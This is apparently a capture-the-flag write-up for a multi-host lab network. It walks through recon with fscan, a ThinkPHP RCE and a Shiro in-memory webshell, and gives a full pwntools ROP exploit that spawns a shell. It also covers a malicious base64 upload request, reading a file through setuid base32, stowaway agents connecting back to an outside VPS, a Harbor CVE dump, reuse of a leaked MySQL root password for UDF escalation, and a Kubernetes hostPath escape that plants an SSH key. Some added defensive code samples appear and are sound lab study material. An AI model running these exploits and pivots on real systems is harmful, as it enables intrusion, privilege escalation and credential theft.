flag01
An fscan scan shows ThinkPHP running; a tool scan of it yields a shell, and connecting to it gives flag1.

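Upload fscan and scan the internal network.
I had an AI summarize the results:
| IP address | Open port/service | Version/system info | Vulnerability | Risk level | Exploitation/impact | Remediation |
|---|---|---|---|---|---|---|
| 172.28.23.26 | 21/FTP (vsFTPd) | vsFTPd 3.0.3 (Ubuntu) | Anonymous login | Medium-high | OASystem.zip can be downloaded, leaking sensitive data | Disable anonymous login; check for and remove exposed files |
| 172.28.23.26 | 22/SSH | OpenSSH 7.2p2 Ubuntu | No direct vulnerability for now | Low | - | Upgrade OpenSSH; disable password login |
| 172.28.23.26 | 80/HTTP (Apache) | Apache 2.4.18 | 新翔 OA management system (contact details exposed) | Medium | Possible business-logic vulnerabilities | Review web application security; limit exposure of sensitive information |
| 172.28.23.33 | 22/SSH | OpenSSH 8.2p1 Ubuntu | No direct vulnerability for now | Low | - | Upgrade OpenSSH; disable password login |
| 172.28.23.33 | 8080/HTTP (SpringBoot) | 智联科技 ERP back end | SpringBoot Actuator heap dump exposure | High | Leaks memory contents (e.g. database passwords) | Disable unauthenticated Actuator access; change sensitive credentials |
| 172.28.23.33 | 8080/HTTP (SpringBoot) | 智联科技 ERP back end | SpringBoot Env unauthorized access | High | Reads environment variables and configuration | Restrict access to the /env endpoint |
| 172.28.23.17 | 22/SSH | OpenSSH 8.2p1 Ubuntu | No direct vulnerability for now | Low | - | Upgrade OpenSSH; disable password login |
| 172.28.23.17 | 80/HTTP (Apache) | Apache 2.4.41 | Untitled page (needs further testing) | TBD | - | Inspect the site content and confirm whether hidden vulnerabilities exist |
| 172.28.23.17 | 8080/HTTP (ThinkPHP) | ThinkPHP 5.0.23 | ThinkPHP 5.0.23 remote code execution (RCE) | Critical | Direct control of the server | Upgrade ThinkPHP immediately or disable the port |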
flag03
First analyze host .33 and scan it.

Download the heapdump and look at its contents:
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\0raN9e\Desktop\春秋云镜\heapdump

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================
Write a Shiro in-memory webshell into it.

A quick check shows it is not running with root privileges.

/home/ops01 >ls
HashNote
Download it for analysis.
It is a pwn challenge; I don't know pwn, so I'll just run a script found online.
/ >netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 172.28.23.33:58428 100.100.0.3:80 TIME_WAIT -
tcp 0 0 172.28.23.33:50218 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:46490 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:59764 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:53762 100.100.30.25:80 ESTABLISHED -
tcp 0 0 172.28.23.33:57550 100.100.145.133:80 TIME_WAIT -
tcp6 0 0 :::8080 :::* LISTEN 667/java
tcp6 0 0 172.28.23.33:8080 172.28.23.17:60456 ESTABLISHED 667/java
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
from pwn import *
context.arch='amd64'
def add(key,data='b'):
    p.sendlineafter(b'Option:',b'1')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)
def show(key):
    p.sendlineafter(b'Option:',b'2')
    p.sendlineafter(b"Key: ",key);
def edit(key,data):
    p.sendlineafter(b'Option:',b'3')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)
def name(username):
    p.sendlineafter(b'Option:',b'4')
    p.sendlineafter(b'name:',username)
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
    0:username+0x10,
    0x10:[username+0x20,len(ukey),\
        ukey,0],
    0x30:[stack,0x10]
    },filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0
rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall
fake_chunk=flat({
    0:username+0x20,
    0x20:[username+0x30,len(ukey),\
        ukey,0],
    0x40:[main_ret,0x100,b'/bin/sh\x00']
    },filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
    rdi,username+0x50,
    rsi,0,
    rdx,0,0,
    rax,0x3b,
    syscall
    ])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()

flag03: flag{6a326f94-6526-4586-8233-152d137281fd}
flag02
Log in anonymously directly:
└─# proxychains4 ftp 172.28.23.26
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.28.23.26:21 ... OK
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:orange): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||53964|)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.28.23.26:53964 ... OK
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 7536672 Mar 23 2024 OASystem.zip
get OASystem.zip
Unzip it and analyze the contents.
<?php
/**
 * Description: PhpStorm.
 * Author: yoby
 * DateTime: 2018/12/4 18:01
 * Email:logove@qq.com
 * Copyright Yoby, all rights reserved
 */
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
    $type = ".".$result[2];
    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
The web root contains uploadbase64.php. It matches data:image/<input1>;base64,<input2>, uses <input1> as the file extension, and writes base64_decode(<input2>) as the file contents.
POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
imgbase64=
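The flaw in uploadbase64.php is that the client-supplied MIME subtype becomes the file extension and the decoded body is never inspected. The following added example (not code from the original write-up or from the OA system) shows the missing server-side check in Python; the three-type allowlist, the 2 MiB limit and the name validate_upload are assumptions.

```python
import base64
import binascii
import re
import secrets

# Assumed allowlist: MIME subtype -> (extension stored on disk, accepted magic bytes)
ALLOWED = {
    "png": (".png", (b"\x89PNG\r\n\x1a\n",)),
    "jpeg": (".jpg", (b"\xff\xd8\xff",)),
    "gif": (".gif", (b"GIF87a", b"GIF89a")),
}
DATA_URI = re.compile(r"data:image/([a-z]+);base64,([A-Za-z0-9+/=\s]+)", re.ASCII)
MAX_BYTES = 2 * 1024 * 1024  # assumed upload size limit


def validate_upload(img: str):
    """Return (stored_name, content) for an acceptable upload, else raise ValueError."""
    m = DATA_URI.fullmatch(img)
    if not m:
        raise ValueError("not a base64 image data URI")
    subtype, payload = m.groups()
    if subtype not in ALLOWED:
        # uploadbase64.php wrote this client-chosen subtype out as the extension
        raise ValueError(f"image type {subtype!r} is not allowed")
    ext, magics = ALLOWED[subtype]
    try:
        content = base64.b64decode("".join(payload.split()), validate=True)
    except binascii.Error as exc:
        raise ValueError("invalid base64 payload") from exc
    if len(content) > MAX_BYTES:
        raise ValueError("upload too large")
    if not content.startswith(magics):
        raise ValueError("content does not match the declared image type")
    # The stored name is server-generated and never contains client text
    return secrets.token_hex(16) + ext, content


# Constructed samples: a PNG header, a disallowed subtype, and a mislabeled body
_png = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8).decode()
_txt = base64.b64encode(b"plain text, not an image").decode()
GOOD, BAD_TYPE, BAD_BODY = (f"data:image/{t};base64,{b}" for t, b in
                            (("png", _png), ("php", _txt), ("png", _txt)))

if __name__ == "__main__":
    print(validate_upload(GOOD)[0])
```

Serving the upload directory with script execution disabled is a separate control that this check does not replace.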

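After writing a command, the response is ret=127.
Trying the AntSword plugin's LD method for privilege escalation works. Edit the included file on line 31 of .antproxy.php to add the upload directory, then modify the file. It seems only GET parameters are supported here; commands are executed from the front end and run as www-data.
For privilege escalation, run:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;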

-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 44680 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Jan 27 2020 /bin/mount
-rwsr-xr-x 1 root root 40128 Aug 31 2019 /bin/su
-rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Jan 27 2020 /bin/umount
-rwsr-xr-x 1 root root 71824 Aug 31 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Aug 31 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Aug 31 2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-- 1 root stapusr 173376 Apr 3 2016 /usr/bin/staprun
-rwsr-xr-x 1 root root 39664 Mar 3 2017 /usr/bin/base32
-rwsr-xr-x 1 root root 54256 Aug 31 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 Aug 31 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 136808 Jan 21 2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 42992 Jun 12 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 27 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 10104 Jan 2 2016 /usr/lib/s-nail/s-nail-privsep
http://172.28.23.26/upload/.antproxy.php?1=system("base32 /flag02.txt");

flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
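The listing above includes /usr/bin/base32 with the setuid bit set, which is what let www-data read /flag02.txt. The following added example (not from the original write-up) compares such a listing against a baseline of expected setuid binaries; the baseline set, the severity labels and the function name are assumptions.

```python
# Assumed baseline of setuid binaries that the base image is expected to ship
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
}

# Lines copied from the listing above, plus one constructed non-setuid line (base64)
LISTING = """\
-rwsr-xr-x 1 root root 40128 Aug 31 2019 /bin/su
-rwsr-xr-- 1 root stapusr 173376 Apr 3 2016 /usr/bin/staprun
-rwsr-xr-x 1 root root 39664 Mar 3 2017 /usr/bin/base32
-rwsr-xr-x 1 root root 136808 Jan 21 2021 /usr/bin/sudo
-rwxr-xr-x 1 root root 35000 Mar 3 2017 /usr/bin/base64
"""


def audit_suid(listing: str, baseline=frozenset(BASELINE)):
    """Return [(path, severity)] for setuid files that are not in the baseline."""
    findings = []
    for line in listing.splitlines():
        parts = line.split(None, 8)  # mode links owner group size mon day year path
        if len(parts) != 9 or len(parts[0]) < 10:
            continue  # not an `ls -la` entry
        mode, owner, path = parts[0], parts[2], parts[8]
        if mode[3] not in "sS" or path in baseline:
            continue  # not setuid, or expected on this image
        # Root-owned and executable by "other": any local user runs it as root
        world_exec = mode[9] in "xt"
        severity = "high" if owner == "root" and world_exec else "review"
        findings.append((path, severity))
    return findings


if __name__ == "__main__":
    for path, severity in audit_suid(LISTING):
        print(f"{severity:6} {path}")
```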
ifconfig shows two IP addresses, so there is a second network layer.

Upload fscan and scan it:
./fscan -h 172.22.14.0/24
The main findings are:
172.22.14.37 (Linux):
- SSH (port 22): OpenSSH 7.6p1
- Port 2379 (possibly etcd) and port 10250 (possibly the Kubernetes API)
172.22.14.46 (Linux):
- HTTP (port 80): running Harbor
A second-layer proxy forward is needed.
flag5
frp kept giving me trouble with multi-layer proxy forwarding, so I switched to stowaway.
Run on my own VPS:
./linux_x64_admin -l 2223 -s 2223
Run on the first layer, i.e. the target's entry host:
./linux_x64_agent -c 27.25.151.99:2223 -s 2223 --reconnect 8
On the second layer, i.e. inside the OA system:
./linux_x64_agent -c 172.28.23.17:8889 -s 2223 --reconnect 8
Finally, go through SOCKS on port 6000 and attack as before (this really is a lot more convenient).
First target 172.22.14.46 with a CVE: CVE-2022-46463/harbor.py at main · 404tk/CVE-2022-46463

Took a quick look at the information:
python harbor.py http://172.22.14.46/ --dump harbor/secret --v2
It contains a run.sh and a flag file, which gives flag5.

flag6
Download the projectadmin image.

Looking at run.sh:
#!/bin/bash
sleep 1
# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null
Locate ProjectAdmin-0.0.1-SNAPSHOT.jar and decompile it:
mkdir unpacked
cd unpacked
jar -xf ../ProjectAdmin-0.0.1-SNAPSHOT.jar
This yields the database details:

spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
Use MDUT directly for UDF privilege escalation to get flag6.

flag4
Next, scan 172.22.14.37; upload first:
fscan -h 172.22.14.37 -p 1-65535
D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan -h 172.22.14.37 -p 1-65535
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-05-19 16:53:10] [INFO] 暴力破解线程数: 1
[2025-05-19 16:53:11] [INFO] 开始信息扫描
[2025-05-19 16:53:11] [INFO] 最终有效主机数量: 1
[2025-05-19 16:53:11] [INFO] 开始主机扫描
[2025-05-19 16:53:11] [INFO] 有效端口数量: 65535
[2025-05-19 16:53:11] [SUCCESS] 端口开放 172.22.14.37:22
[2025-05-19 16:53:11] [SUCCESS] 服务识别 172.22.14.37:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2380
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2379
[2025-05-19 16:54:49] [SUCCESS] 服务识别 172.22.14.37:2380 =>
[2025-05-19 16:54:54] [SUCCESS] 服务识别 172.22.14.37:2379 =>
[2025-05-19 16:57:10] [SUCCESS] 端口开放 172.22.14.37:6443
[2025-05-19 16:58:05] [SUCCESS] 服务识别 172.22.14.37:6443 =>
The Kubernetes API server allows unauthorized access:

{
"paths": [
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/admissionregistration.k8s.io/v1beta1",
"/apis/apiextensions.k8s.io",
"/apis/apiextensions.k8s.io/v1",
"/apis/apiextensions.k8s.io/v1beta1",
"/apis/apiregistration.k8s.io",
"/apis/apiregistration.k8s.io/v1",
"/apis/apiregistration.k8s.io/v1beta1",
"/apis/apps",
"/apis/apps/v1",
"/apis/authentication.k8s.io",
"/apis/authentication.k8s.io/v1",
"/apis/authentication.k8s.io/v1beta1",
"/apis/authorization.k8s.io",
"/apis/authorization.k8s.io/v1",
"/apis/authorization.k8s.io/v1beta1",
"/apis/autoscaling",
"/apis/autoscaling/v1",
"/apis/autoscaling/v2beta1",
"/apis/autoscaling/v2beta2",
"/apis/batch",
"/apis/batch/v1",
"/apis/batch/v1beta1",
"/apis/certificates.k8s.io",
"/apis/certificates.k8s.io/v1beta1",
"/apis/coordination.k8s.io",
"/apis/coordination.k8s.io/v1",
"/apis/coordination.k8s.io/v1beta1",
"/apis/events.k8s.io",
"/apis/events.k8s.io/v1beta1",
"/apis/extensions",
"/apis/extensions/v1beta1",
"/apis/networking.k8s.io",
"/apis/networking.k8s.io/v1",
"/apis/networking.k8s.io/v1beta1",
"/apis/node.k8s.io",
"/apis/node.k8s.io/v1beta1",
"/apis/policy",
"/apis/policy/v1beta1",
"/apis/rbac.authorization.k8s.io",
"/apis/rbac.authorization.k8s.io/v1",
"/apis/rbac.authorization.k8s.io/v1beta1",
"/apis/scheduling.k8s.io",
"/apis/scheduling.k8s.io/v1",
"/apis/scheduling.k8s.io/v1beta1",
"/apis/storage.k8s.io",
"/apis/storage.k8s.io/v1",
"/apis/storage.k8s.io/v1beta1",
"/healthz",
"/healthz/autoregister-completion",
"/healthz/etcd",
"/healthz/log",
"/healthz/ping",
"/healthz/poststarthook/apiservice-openapi-controller",
"/healthz/poststarthook/apiservice-registration-controller",
"/healthz/poststarthook/apiservice-status-available-controller",
"/healthz/poststarthook/bootstrap-controller",
"/healthz/poststarthook/ca-registration",
"/healthz/poststarthook/crd-informer-synced",
"/healthz/poststarthook/generic-apiserver-start-informers",
"/healthz/poststarthook/kube-apiserver-autoregistration",
"/healthz/poststarthook/rbac/bootstrap-roles",
"/healthz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/healthz/poststarthook/start-apiextensions-controllers",
"/healthz/poststarthook/start-apiextensions-informers",
"/healthz/poststarthook/start-kube-aggregator-informers",
"/healthz/poststarthook/start-kube-apiserver-admission-initializer",
"/livez",
"/livez/autoregister-completion",
"/livez/etcd",
"/livez/log",
"/livez/ping",
"/livez/poststarthook/apiservice-openapi-controller",
"/livez/poststarthook/apiservice-registration-controller",
"/livez/poststarthook/apiservice-status-available-controller",
"/livez/poststarthook/bootstrap-controller",
"/livez/poststarthook/ca-registration",
"/livez/poststarthook/crd-informer-synced",
"/livez/poststarthook/generic-apiserver-start-informers",
"/livez/poststarthook/kube-apiserver-autoregistration",
"/livez/poststarthook/rbac/bootstrap-roles",
"/livez/poststarthook/scheduling/bootstrap-system-priority-classes",
"/livez/poststarthook/start-apiextensions-controllers",
"/livez/poststarthook/start-apiextensions-informers",
"/livez/poststarthook/start-kube-aggregator-informers",
"/livez/poststarthook/start-kube-apiserver-admission-initializer",
"/logs",
"/metrics",
"/openapi/v2",
"/readyz",
"/readyz/autoregister-completion",
"/readyz/etcd",
"/readyz/log",
"/readyz/ping",
"/readyz/poststarthook/apiservice-openapi-controller",
"/readyz/poststarthook/apiservice-registration-controller",
"/readyz/poststarthook/apiservice-status-available-controller",
"/readyz/poststarthook/bootstrap-controller",
"/readyz/poststarthook/ca-registration",
"/readyz/poststarthook/crd-informer-synced",
"/readyz/poststarthook/generic-apiserver-start-informers",
"/readyz/poststarthook/kube-apiserver-autoregistration",
"/readyz/poststarthook/rbac/bootstrap-roles",
"/readyz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/readyz/poststarthook/start-apiextensions-controllers",
"/readyz/poststarthook/start-apiextensions-informers",
"/readyz/poststarthook/start-kube-aggregator-informers",
"/readyz/poststarthook/start-kube-apiserver-admission-initializer",
"/readyz/shutdown",
"/version"
]
}
PS E:\tools> kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: test
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-697jq 1/1 Running 0 61s
Write a YAML file:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /
PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f aaa.yaml
Please enter Username: test
Please enter Password: deployment.apps/nginx-deployment configured
PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-697jq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: test
root@nginx-deployment-864f8bfd6f-697jq:/# ls
root@nginx-deployment-864f8bfd6f-697jq:/# id
uid=0(root) gid=0(root) groups=0(root)
Write an SSH key in:
root@nginx-deployment-864f8bfd6f-697jq:/# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQ................................ root@kali' > /mnt/root/.ssh/authorized_keys
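The Deployment above mounts the node's root filesystem through a hostPath volume, which is why a write under /mnt inside the container lands in the host's /root/.ssh. The following added example (not from the original write-up) is an admission-style check that flags such mounts; it generalizes to Pods, CronJobs and other workload kinds, and the sensitive-path list and function names are assumptions.

```python
import json

SENSITIVE = ("/etc", "/root", "/proc", "/var/run", "/var/lib/kubelet")  # assumed policy

# The Deployment from the write-up, transcribed to JSON (trimmed to the relevant fields)
DEPLOYMENT = json.loads("""
{"kind": "Deployment", "metadata": {"name": "nginx-deployment"},
 "spec": {"template": {"spec": {
   "containers": [{"name": "nginx", "image": "nginx:1.8",
                   "volumeMounts": [{"mountPath": "/mnt", "name": "test-volume"}]}],
   "volumes": [{"name": "test-volume", "hostPath": {"path": "/"}}]}}}}
""")


def pod_spec(manifest: dict) -> dict:
    """Locate the PodSpec in a Pod, a CronJob, or any workload with spec.template."""
    spec = manifest.get("spec", {})
    if manifest.get("kind") == "Pod":
        return spec
    if manifest.get("kind") == "CronJob":
        spec = spec.get("jobTemplate", {}).get("spec", {})
    return spec.get("template", {}).get("spec", {})


def risky_hostpaths(manifest: dict):
    """Return (volume, host_path, container, mount_path, writable) per risky mount."""
    spec = pod_spec(manifest)
    risky = {}
    for vol in spec.get("volumes", []):
        host = vol.get("hostPath")
        if not host:
            continue
        path = "/" + host.get("path", "").strip("/")  # "/etc/" -> "/etc", "/" -> "/"
        if path == "/" or any(path == p or path.startswith(p + "/") for p in SENSITIVE):
            risky[vol["name"]] = path
    findings = []
    for ctr in spec.get("containers", []) + spec.get("initContainers", []):
        for mnt in ctr.get("volumeMounts", []):
            if mnt["name"] in risky:
                findings.append((mnt["name"], risky[mnt["name"]], ctr["name"],
                                 mnt["mountPath"], not mnt.get("readOnly", False)))
    return findings


if __name__ == "__main__":
    print(risky_hostpaths(DEPLOYMENT))
```

In a cluster this belongs in admission control (the Pod Security Standards baseline level forbids hostPath volumes), alongside disabling anonymous access to the API server.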

root@ubuntu-k8s:~# ls -al
total 56
drwx------ 8 root root 4096 Mar 17 16:32 .
drwxr-xr-x 22 root root 4096 May 19 16:21 ..
lrwxrwxrwx 1 root root 9 Mar 17 16:32 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 3 root root 4096 Jul 18 2023 .cache
drwx------ 3 root root 4096 Jul 18 2023 .gnupg
drwxr-xr-x 4 root root 4096 Mar 17 15:53 .kube
drwxr-xr-x 14 root root 4096 Mar 17 15:49 metarget
-rw------- 1 root root 1136 Mar 25 2024 .mysql_history
-rw-r--r-- 1 root root 295 Mar 17 16:11 nginx-deployment.yaml
drwxr-xr-x 2 root root 4096 Jul 18 2023 .pip
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 206 May 19 16:21 .pydistutils.cfg
-rw------- 1 root root 7 Mar 17 15:47 .python_history
drwx------ 2 root root 4096 Jul 18 2023 .ssh
Looking at the contents gives:
root@ubuntu-k8s:~# cat .mysql_history
_HiStOrY_V2_
show\040databases;
create\040database\040flaghaha;
use\040flaghaha
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag06`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag06`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
show\040tables;
drop\040table\040flag06;
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag04`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag04`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
INSERT\040INTO\040`flag`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
INSERT\040INTO\040`flag04`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
exit
Decode it to get the flag:
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}